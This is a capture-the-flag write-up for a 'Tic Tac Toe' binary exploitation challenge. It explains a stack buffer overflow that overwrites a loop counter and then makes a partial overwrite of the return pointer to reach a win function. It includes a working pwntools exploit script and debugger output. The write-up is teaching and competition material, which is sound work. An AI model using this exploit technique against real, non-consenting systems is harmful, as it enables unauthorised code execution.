# Tic Tac Toe
The description for this challenge is as follows:
*I made this super impressive Tic Tac Toe application; it will tell you who won a match. Don't you think that is amazing? I'm hosting it at host.cg21.metaproblems.com on port 3120 if you want to test it out. Here I'll even give you the source code to try it out yourself if you would like!*
*No brute force is needed, the solution should work everytime!*
This was one of the easier pwn problems, with 79 solves, and it was worth 200 points. In my opinion, the reverse engineering was the hardest part. The downloadables for this challenge were a tar archive that contained the original binary, C source code, and docker setup information; I just ran the binary locally and did not use the docker setup.
**TL;DR Solution:** Notice that you can keep inputting bad characters in order to overflow a stack buffer. Specifically, you can overwrite into the counter variable in order to target the return pointer for overwrite. Then do a partial overwrite on the return pointer in order to call the win function.
## Original Writeup Link
This writeup is also available on my GitHub! View it there via this link: https://github.com/knittingirl/CTF-Writeups/tree/main/pwn_challs/MetaCTF21/Tic_Tac_Toe
## Gathering Information
As usual, my first step is to run the program with some different inputs. If I enter in 9 x's and o's, it determines a winner and prints it out:
knittingirl@piglet:~/CTF/metaCTF21/tic_tac_toe$ ./chall
Check out this sweet Tic-Tac-Toe Solver I made!
All you have to do is to input your array into the system and I'll tell you who won
You can enter them all at once, or one at a time if you prefer
X's win the game
The game is a CAT
When I run checkes on the binary, I can see that most notably, PIE is enabled, as is NX. So we will not be able to do stack-based shellcode, and addresses in the code section will be randomized.
knittingirl@piglet:~/CTF/metaCTF21/tic_tac_toe$ checksec chall
[*] '/home/knittingirl/CTF/metaCTF21/tic_tac_toe/chall'
Arch: amd64-64-little
Stack: No canary found
NX: NX enabled
PIE: PIE enabled
Next, I take a look at how the program works, using the C code since that is available. Notably, the program contains a win function:
//Useless function when you think about it, because it's impossible to get here... Right?
void win(){
int fd;
char buffer[100];
fd = open("./flag.txt",0);
read(fd, buffer,100);
I am also interested in the portion that reads in user input. If the last character of the input was an x, X, o, O, or 0, and the length of the input is more 9, the program will stop reading in characters. Otherwise, it will keep reading them in to a stack variable, and new characters are loaded in to the address of the board variable, plus the value of the counter variable. As long as we do not input any newlines, that counter variable will keep going up. This then presents a good opportunity for a stack-based buffer overflow; I simply need to ensure that I enter all my characters in on one line, and that no characters past the ninth are on my "good characters" list until I am ready to return out.
int read_board(){
char board[3][3];
char counter = 0;
//read the board in
while (counter < 9){
read(0, (char*)board+counter++, 1);
if (*((char *)board+counter-1) == '\n')
//checks for the last character to be o,O,0,x,X
//I was a bit lazy in the checks though, so you need to be consistant when using characters
//Or the program won't match correctly
if (*((char*)board + counter-1) == 'o' || *((char*)board + counter-1) == 'O' ||*((char*)board + counter-1) == '0' || *((char*)board + counter-1) == 'x' || *((char*)board + counter-1) == 'X'){
puts("Bad Character, try again");
Another interesting fact is that when I do some basic analysis of the binary in Ghidra, I can see that the counter variable is at a higher stack offset than the board variable, which means that this stack-based overwrite will overwrite the counter variable, specifically on the tenth character (0x13 - 0x9 = 10). As a result, I will have to be careful to make that overwrite appropriately in order to hit the return pointer in subsequent writes.
undefined read_board()
undefined AL:1 <RETURN> XREF[1]: 001014c5(W)
undefined8 RAX:8 long_i_minus_1 XREF[1]: 001014c5(W)
undefined1 Stack[-0x9]:1 counter XREF[12]: 001014b0(W),
undefined1[10] Stack[-0x13] board XREF[0,13]: 001014c9(*),
read_board XREF[4]: Entry Point(*), main:00101640(c),
00102198, 00102310(*)
001014a8 55 PUSH RBP
## Planning the Exploit:
At this point, my approach is fairly straightforward. I need to target the return pointer for overwrite, and because of the presence of PIE, I should aim for a partial overwrite. To check how viable this is, I do a run of the program in GDB/GEF where I simply input nine x's and o's, then check where the read_board function returns to normally in comparison with the address of the win function.
0x564c588a8601 <read_board+345> call 0x564c588a8449 <print_winner>
0x564c588a8606 <read_board+350> nop
0x564c588a8607 <read_board+351> leave
→ 0x564c588a8608 <read_board+352> ret
↳ 0x564c588a8645 <main+60> mov edi, 0x0
0x564c588a864a <main+65> call 0x564c588a8030 <_exit@plt>
0x564c588a864f <win+0> push rbp
0x564c588a8650 <win+1> mov rbp, rsp
0x564c588a8653 <win+4> sub rsp, 0x70
0x564c588a8657 <win+8> mov esi, 0x0
─────────────────────────────────────────────────────────────────── threads ────
[#0] Id 1, Name: "chall", stopped 0x564c588a8608 in read_board (), reason: BREAKPOINT
───────────────────────────────────────────────────────────────────── trace ────
[#0] 0x564c588a8608 → read_board()
[#1] 0x564c588a8645 → main()
gef➤ x/gx $rsp
0x7ffebc7e6df8: 0x0000564c588a8645
gef➤ x/gx win
0x564c588a864f <win>: 0x70ec8348e5894855
This turns out to be very convenient; it returns out near the end of the main function at address 0x0000564c588a8645, and the win function is at 0x0000564c588a864f. As a result, a single-byte overwrite should work. In addition, the byte that I need to overwrite is the byte of 'O'. This means that once it is input, the program will return out to the win function that has been newly placed in the return pointer, which is ideal.
Finally, I do need to figure out exactly what I need to overwrite the counter stack variable with in order to overwrite the lowest byte of the return pointer. I did it by looking at the stack offset of the board variable in Ghidra, which is -0x13, so the appropriate offset should be at 0x13. 1 is getting added to the value in counter before it is used to determine where the stack write occurs, so the value to write to the counter variable should be 0x12. The fact that this is low also explains why entering a large amount of bad characters in ascii typically fails to generate a segfault; the return pointer is being overshot completely.
## Writing the Exploit
At this point, the exploit itself is very straightforward. I just need to pad it with nine bad characters, include a b'\x12' to overwrite the counter, the add an 'O' in order to partial overwrite the return pointer with the function. Here is the full exploit script:
from pwn import *
#target = process('./chall')
#pid = gdb.attach(target, "\nb *read_board+29\nb *read_board+352\n set disassembly-flavor intel\ncontinue")
target = remote('host.cg21.metaproblems.com', 3120)
print(target.recvuntil(b'time if you prefer'))
payload = (b'a' * 9 + b'\x12' + b'\x4f')
And here is how it looks when I run the script:
knittingirl@piglet:~/CTF/metaCTF21/tic_tac_toe$ python3 tic_tac_toe_payload.py
[+] Opening connection to host.cg21.metaproblems.com on port 3120: Done
b"Check out this sweet Tic-Tac-Toe Solver I made!\nAll you have to do is to input your array into the system and I'll tell you who won\nYou can enter them all at once, or one at a time if you prefer"
[*] Switching to interactive mode
Bad Character, try again
Bad Character, try again
Bad Character, try again
Bad Character, try again
Bad Character, try again
Bad Character, try again
Bad Character, try again
Bad Character, try again
Bad Character, try again
Bad Character, try again
Something went wrong
Something went wrong
Something went wrong
The game is a CAT
Thanks for reading!